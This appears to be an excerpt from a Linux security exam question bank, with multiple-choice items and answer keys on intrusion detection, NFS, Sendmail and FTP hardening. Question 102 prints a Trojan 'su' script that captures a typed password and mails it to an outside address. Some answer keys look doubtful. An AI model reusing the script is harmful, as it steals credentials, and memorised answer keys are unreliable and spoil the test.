Answer: C
Question: 88
Ryan, a newly hired system administrator, wants to maximize security on all company servers.
At Ryan's former job, many company servers were cracked and Trojan horses were later found
scattered in numerous places on the systems. Which of the following tools is the most effective
method of determining whether a system program has been altered?
A. SATAN
B. Tripwire
C. CERTchk
D. PGP
Answer: B
Question: 89
An administrator has noticed several attempted attacks revolving around three different ports on a
system server. He wants to monitor all activity on the specified ports and send a message to any
attacker attempting to enter the system. Which of the following would best accomplish this task?
A. PortSentry
B. portmon
C. nmap
D. Tripwire
E. portmap
Answer: A
Question: 90
Paul thinks an attacker has been attempting to port scan his system. PortSentry is installed on
the machine, but Paul is unsure where to look for the information that PortSentry has gathered
about the attacker. Which of the following files contains information about attempted attacks?
A. portsentry.log
B. /etc/security
C. /var/log/secure
D. portsentry.history
Answer: D
Question: 91
John runs Sysmon on his server. He has been reading the Sysmon configuration file and is
unsure about the line below. Considering this line, which of the following is TRUE regarding
Sysmon's behavior?
config errorsto $admin
A. In the event of an error, a message will be sent to the $admin address.
B. In the event of an error, Sysmon will restart itself.
C. The number of logged error messages is limited to the number set by the administrator
($admin).
D. All system errors will be logged in the $admin file.
Answer: A
Question: 92
An administrator would like to make the Sysmon statusfile available on the Web so she can check
Sysmon's status from anywhere. Which of the following Sysmon configuration file entries will put
the statusfile in HTML form?
A. config statusfile html
B. config html /home/httpd/html/sysmon.html
C. config statusfile sysmon.html
D. config statusfile html /home/httpd/html/sysmon.html
Answer: D
Question: 93
Webmin provides an efficient Web interface for system maintenance and configuration of many
system services. Which of the following CANNOT be done through Webmin?
A. Configuring network interfaces, routes, hosts, and DNS
B. Modifying users and general options for WU-FTPD
C. Editing the kernel and changing what partitions are available at boot time
D. Changing the primary boot device
Answer: D
Question: 94
A certification authority distributes digital certificates that include important pieces of information,
such as the identity of the secure server. Which of the following is NOT included in a digital
certificate?
A. The public key for that particular site
B. A digital signature validating the certificate
C. A list of operations that can be performed using the certificate
D. A list of the services available on the server
Answer: D
Question: 95
A secure server using SSL and digital certificates allows customers to pay for orders using their
credit cards over a secure channel. Upon validation by the server, the clients receive the public
key. Which of the following is used by the client to initiate the secure connection, and how is it
obtained?
A. Private key; sent to the client by the Certification Authority
B. Private key; sent to the client by the server
C. Session key; generated by the client based on the public key
D. Session key; generated by the server based on the public key
Answer: C
Question: 96
You are a system administrator and want to be e-mailed immediately when an unauthorized user
has broken into your system. Which of the following programs best suits your needs?
A. Sysmon
B. PortSentry
C. SATAN
D. Tripwire
Answer: B
Question: 97
Telnet poses several security risks when it is used across a protected network. Which of the
following is a security risk of Telnet?
A. It transmits data using weak encryption.
B. It transmits data in clear text.
C. It is susceptible to buffer overflow attacks.
D. It broadcasts the IP address of the originating host after passing through a firewall.
Answer: B
Question: 98
A system administrator wants to share the /share/downloads directory on his NFS servers. In
order to do this he should add the line below to the ______ file.
/share/downloads *.localdomain(ro)
A. /etc/hosts.allow
B. /etc/host.conf
C. /etc/fstab
D. /etc/exports
E. /etc/smb.conf
Answer: D
Question: 99
A potential security risk of NFS is a user logging onto the client as root. To minimize this threat,
NFS comes with which of the following features?
A. all_squash
B. root_squash
C. noaccess
D. rw="list of users"
E. anonuid=0, anongid=0
Answer: B
Question: 100
Sally, a system administrator, has properly configured an NFS server (sunflower). There are four
other NFS clients on the LAN that utilize the NFS share on sunflower (sparrow, robin, redbird,
and bluebird). All services are running on standard ports. All four NFS clients are properly
configured to mount NFS partitions on sunflower with the exceptions below.
According to this information, which machine will be able to access the NFS shares on
sunflower?
--The /etc/hosts.deny file on sparrow contains the line "portmap:ALL".
--The /etc/exports file on robin contains the line "/ (noaccess)".
--Redbird cannot utilize Remote Procedure Calls.
--The nfsd and portmap daemons are not running on bluebird.
A. sparrow
B. robin
C. redbird
D. bluebird
Answer: B
Question: 101
As superuser, the system administrator types "echo $PATH" and sees the output below. Why is
this path considered to be a security risk for a superuser?
.:/usr/sbin:/bin:/usr/bin:/sbin:/usr/X11R6/bin
A. This would allow execution of files without the execute bit being set.
B. The superuser could accidentally execute a malicious program because the current working
directory is in the path.
C. The superuser could accidentally execute a malicious program because /sbin is in the path.
D. The dot allows the superuser to execute hidden system files in /.
Answer: B
Question: 102
Examine the code below. This code was saved in a file called "su" in the home directory of Tad,
who is a part-time system administrator. Tad has a path of "/home/tad:/bin:/usr/bin/". What will
happen when Tad types "su -" at the command prompt? (Assume that the true "su" is stored in
/bin.)
#!/bin/bash
echo -n Password:
read $PASS
echo . | mail [email protected] -s $1:$PASS
echo su: incorrect password
rm ./su
A. Tad will become superuser.
B. Tad will receive an error message stating that a Trojan horse has been detected.
C. Tad will receive a "permission denied" error message.
D. Tad will most likely give the root password to the unknown "user."
Answer: D
Question: 103
The major security problem with Network File System (NFS) is that an NFS server and client
trust each other unless explicitly stated otherwise. Which of the following will restrict NFS access
to servers?
A. Edit /etc/hosts.allow to only accept IPs that need to access portmapper.
B. Change permissions on the exported directories to 400.
C. Edit /etc/exports to include the line "/mnt/eris/local apollon(rw)".
D. Edit /etc/exports to include the line "/mnt/eris/local apollon(ro,no_root_squash)".
Answer: D
Question: 104
NIS+ was developed in response to several security risks found in NIS. Which of the following is a
potential security risk when using NIS?
A. NIS relies on passwords in /etc/passwd that are viewable by users.
B. hosts.allow and hosts.deny are not used in conjunction with NIS.
C. Unencrypted queries and replies are passed across the network.
D. The NIS slave server cannot be configured to disable an account after a specified number of
logins.
Answer: C
Question: 105
Although used on many systems to handle e-mail functions, Sendmail poses a significant risk to
Linux and other Unix variants. Why?
A. Sendmail appends its configuration file to handle multiple connections and types of
connections.
B. The Sendmail daemon spawns child processes to handle multiple simultaneous requests,
which may cause a buffer overflow resulting in a root shell.
C. Sendmail uses ports above 1024, which are exploitable by crackers.
D. Sendmail sets the sticky bit on its directories, which grants all data, including worms
attached to e-mail, root permissions on the system.
E. Sendmail must be run as root to perform many of its tasks.
Answer: E
Question: 106
Which of the following presents a potential security risk of Sendmail?
A. Local users can flood Sendmail with requests to flush the queue.
B. Sendmail uses plain text to authenticate user passwords.
C. Sendmail does not use ANSI standard, which will prevent Sendmail from entering
debugging mode and granting root permissions when it receives unknown characters.
D. Sendmail stores data in the swap until the data transmission is complete, which may cause a
buffer overflow on busy systems.
Answer: A
Question: 107
Patrick, the system administrator, is concerned about the security of Sendmail and decides to
install smap. Which of the following best describes smap?
A. The Sendmail daemon passes the request to smap, which parses the data against a table of
malicious programs and IP addresses known for originating such programs.
B. smap changes the permissions on all incoming data, which ensures that no attached program
has root privileges.
C. smap does not run as root or have access to anything outside the mail queue, so an attacker
will not be able to gain access outside the mail queue.
D. smap encrypts the data passing between machines by using a specified encryption algorithm
and passing public and private encryption keys to verify the host.
Answer: C
Question: 108
Additional security for IMAP can be provided by using which of the following?
A. RSA encryption in hosts.allow and hosts.deny
B. Secure Socket Layer (SSL) protocol for encryption of communications
C. PGP authentication to verify the origin of the e-mail
D. MD5 verification against the data field to detect the inclusion of malicious programs
Answer: B
Question: 109
In response to the risks associated with POP, APOP was developed to increase security. Which
of the following represents an added security feature of APOP?
A. It encrypts the password and login name.
B. All data is encapsulated using TCP Wrappers and delivered to the client.
C. The body of the message is sent after the client has been verified.
D. After the connection between server and client is established, data is sent as one large file
instead of packets.
Answer: A
Question: 110
Although still one of the most widely used services on the Internet, anonymous FTP poses a
potential security threat. Why?
A. The requested data is sent in IPX format.
B. If a security hole is found, it can be easily exploited.
C. The user gains a root shell when using an anonymous account.
D. The FTP server administrator is not able to obtain the IP of the requesting machine.
Answer: B
Question: 111
An administrator wants to enable FTP on an as-needed basis and does not want the service to
load at system start-up. In order to do this, he should comment out the lines pertaining to FTP in
the __________ file. (Choose the best answer.)
A. /etc/sysctl.conf
B. /sbin/ident.conf
C. /etc/inetd.conf
D. /etc/inittab
E. /etc/ftpusers
Answer: C
Question: 112
After receiving an urgent request to make the files in the /download directory available to clients,
an administrator enters the sequence of commands below. Which of the following security risks
did the administrator create by doing this?
useradd ftp
mkdir /home/ftp
cp /downloads /home/ftp
A. FTP users will not have to provide a password. This prevents the administrator from tracking
who made the request.
B. The FTP user will belong to the default group (users) on the system, granting FTP users
access to those directories and files that the default group can access.
C. The FTP user is given the permissions of the files contained in the downloads directory. This
presents a security problem if one of those files was owned by root.
D. An FTP user is given read, write and execute permissions to all subdirectories in the /home
directory.
E. The administrator did not set the permissions of the FTP user to 755, thereby allowing FTP
users to view the files of other users.
Answer: B
Question: 113
Mary, a senior system administrator, is reviewing the work of a junior system administrator
assigned to set up an anonymous FTP server. Mary notices the line below in the /etc/passwd file.
Which of the following represents the security risk imposed by this line?
ftp:*:700:700:Anonymous FTP:/home/ftp:/bin/bash
A. The anonymous FTP user is not presented with a password prompt.
B. The FTP server is now vulnerable to a buffer overflow attack.
C. The space in the fifth field will cause an error and drop the user to a root shell.
D. An anonymous FTP user is given a shell from which he can execute uploaded programs.
Answer: D
Question: 114
Which of the following is a characteristic of an effective security policy?
A. It states who is responsible for creating/updating new policy guidelines.
B. It states exactly what is being protected and why.
C. It states that the items at risk must be insured.
D. It states those behaviors that are seen as appropriate by the company.
Answer: B
Question: 115
The system administrator has discovered that his server has been compromised. At a minimum,
the intruder has obtained a username, password, and the root password. Which of the following
will guarantee that the intruder has been removed from the system?
A. Reformat all partitions and reinstall the system.
B. Kill all existing processes and reboot.
C. Change the root password and place a lock on the account to which the intruder has obtained
access.
D. Force all users to change their passwords.
Answer: A